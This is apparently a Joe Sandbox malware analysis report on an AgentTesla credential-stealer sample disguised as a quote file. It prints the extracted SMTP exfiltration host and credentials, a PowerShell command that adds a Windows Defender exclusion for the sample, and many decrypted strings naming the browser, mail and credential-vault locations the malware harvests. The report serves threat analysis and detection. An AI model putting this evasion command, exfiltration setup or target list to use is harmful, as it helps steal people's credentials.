Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quote_8714.exe

Overview

General Information

Sample name:Quote_8714.exe
Analysis ID:1571202
MD5:aab6786b56cd4bebf107aa1f00d680c4
SHA1:785459ff067ac23f52789e7d0b36084186864dcb
SHA256:e834cc0db159080a88d07c5e1c843905f7eb1f3b0b48ad1c5377f159fcb5e5f0
Tags:exeuser-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Quote_8714.exe (PID: 4464 cmdline: "C:\Users\user\Desktop\Quote_8714.exe" MD5: AAB6786B56CD4BEBF107AA1F00D680C4)
    • powershell.exe (PID: 2504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7288 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Quote_8714.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\Quote_8714.exe" MD5: AAB6786B56CD4BEBF107AA1F00D680C4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": "     *o9H+18Q4%;M     "}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2942693861.0000000002ADA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000005.00000002.2940203488.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000000.00000002.1749716667.0000000003A59000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000005.00000002.2942693861.0000000002A81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 5 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Quote_8714.exe.3a82990.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.Quote_8714.exe.3a59970.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  5.2.Quote_8714.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.Quote_8714.exe.3a82990.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      0.2.Quote_8714.exe.3a59970.4.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_8714.exe", ParentImage: C:\Users\user\Desktop\Quote_8714.exe, ParentProcessId: 4464, ParentProcessName: Quote_8714.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", ProcessId: 2504, ProcessName: powershell.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_8714.exe", ParentImage: C:\Users\user\Desktop\Quote_8714.exe, ParentProcessId: 4464, ParentProcessName: Quote_8714.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", ProcessId: 2504, ProcessName: powershell.exe
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 199.79.62.115, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quote_8714.exe, Initiated: true, ProcessId: 7392, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Quote_8714.exe", ParentImage: C:\Users\user\Desktop\Quote_8714.exe, ParentProcessId: 4464, ParentProcessName: Quote_8714.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe", ProcessId: 2504, ProcessName: powershell.exe
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T06:53:52.010600+010020301711A Network Trojan was detected192.168.2.449735199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T06:52:18.315528+010028555421A Network Trojan was detected192.168.2.449735199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T06:52:18.315528+010028552451A Network Trojan was detected192.168.2.449735199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T06:53:52.010600+010028397231Malware Command and Control Activity Detected192.168.2.449735199.79.62.115587TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-09T06:53:52.010600+010028400321A Network Trojan was detected192.168.2.449735199.79.62.115587TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.mbarieservicesltd.com", "Username": "saless@mbarieservicesltd.com", "Password": " *o9H+18Q4%;M "}
                        Source: Quote_8714.exeReversingLabs: Detection: 36%
                        Source: Quote_8714.exeVirustotal: Detection: 47%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: Quote_8714.exeJoe Sandbox ML: detected
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: /log.tmp
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>[
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ]<br>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Time:
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>User Name:
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>Computer Name:
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>OSFullName:
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>CPU:
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>RAM:
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: IP Address:
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <hr>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: New
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: IP Address:
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: mail.mbarieservicesltd.com
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: saless@mbarieservicesltd.com
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: *o9H+18Q4%;M
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: iinfo@mbarieservicesltd.com
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: false
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: appdata
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: KTvkzEc
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: KTvkzEc.exe
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: KTvkzEc
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Type
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <hr>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <b>[
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ]</b> (
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: )<br>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {BACK}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {ALT+TAB}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {ALT+F4}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {TAB}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {ESC}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {Win}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {CAPSLOCK}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {KEYUP}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {KEYDOWN}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {KEYLEFT}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {KEYRIGHT}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {DEL}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {END}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {HOME}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {Insert}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {NumLock}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {PageDown}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {PageUp}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {ENTER}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F1}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F2}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F3}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F4}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F5}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F6}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F7}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F8}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F9}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F10}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F11}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {F12}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: control
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {CTRL}
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: &amp;
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: &lt;
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: &gt;
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: &quot;
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <hr>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: logins
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: IE/Edge
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Windows Secure Note
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Windows Web Password Credential
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Windows Credential Picker Protector
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Web Credentials
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Windows Credentials
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Windows Domain Password Credential
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Windows Extended Credential
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SchemaId
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: pResourceElement
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: pIdentityElement
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: pPackageSid
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: IE/Edge
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UC Browser
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: UCBrowser\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Login Data
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: journal
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: wow_logins
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Safari for Windows
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <array>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <dict>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <string>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </string>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <string>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </string>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: <data>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: </data>
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: -convert xml1 -s -o "
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \fixed_keychain.xml"
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Microsoft\Protect\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: credential
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: QQ Browser
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Default\EncryptedStorage
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Profile
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \EncryptedStorage
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: entries
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: category
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: str3
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: str2
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: blob0
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: password_value
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: IncrediMail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: PopPassword
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SmtpPassword
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Accounts_New
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: PopPassword
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SmtpPassword
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SmtpServer
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: EmailAddress
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Eudora
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: current
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Settings
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: SavePasswordText
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Settings
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ReturnAddress
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Falkon Browser
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: profiles.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: profiles.ini
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \browsedata.db
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: autofill
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ClawsMail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Claws-mail
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \clawsrc
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \clawsrc
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: passkey0
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \accountrc
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: smtp_server
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: address
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: account
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \passwordstorerc
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Flock Browser
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: APPDATA
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: signons3.txt
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: DynDns
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: username=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: password=
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: t6KzXhCh
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: global
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: accounts
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: account.
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: username
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: account.
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Psi/Psi+
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: name
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: password
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: Psi/Psi+
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: APPDATA
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Psi\profiles
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: APPDATA
                        Source: 0.2.Quote_8714.exe.3a59970.4.raw.unpackString decryptor: \Psi+\profiles
